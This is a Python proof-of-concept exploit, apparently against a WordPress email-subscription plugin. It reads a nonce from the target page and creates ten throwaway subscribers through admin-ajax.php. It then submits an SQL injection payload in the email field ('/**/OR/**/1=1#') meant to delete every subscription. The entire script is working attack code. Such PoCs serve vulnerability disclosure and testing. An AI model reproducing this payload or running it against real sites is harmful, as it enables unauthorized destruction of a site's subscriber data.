import re
import string
import random
import requests

TARGET = "http://localhost:8080"

def poc():

    ####
    # 1. Retrieve the value of 'sec_string' required for email subscription
    ####
    resp = requests.get(f"{TARGET}")
    pattern = r'var nonce = \'(.{10})\';'
    match = re.search(pattern, resp.text)
    if match:
        sec_string = match.group(1)
        print("[*] sec_string: " + sec_string)
    
        ####
        # 2. Generate subscribers with random email addresses
        ####
        random_string = ''.join(random.choices(string.ascii_letters + string.digits, k=6))
        for i in range(10):
            data = {
                "action": "store_email",
                "email": f"{random_string}_{i}@example.com",
                "name": f"{random_string}_{i}",
                "is_agreed": "true",
                "sec_string": sec_string
            }
            print("[+] Successfully created subscriber #" + str(i) + " Email: " + data['email'] + ", Name: " + data['name'])
            requests.post(f"{TARGET}/wp-admin/admin-ajax.php", data=data)
        
        ####
        # 3. Create a malicious email address to delete all subscriptions
        ####
        data = {
            "action": "store_email",
            "email": "'/**/OR/**/1=1#@a.a",
            "name": "Email mine",
            "is_agreed": "true",
            "sec_string": sec_string
        }
        print("[+] Malicious email address created Email: " + data['email'] + ", Name: " + data['name'])
        requests.post(f"{TARGET}/wp-admin/admin-ajax.php", data=data)
    else:
        print("[-] 'sec_string' not found")
    

if __name__ == "__main__":
    poc()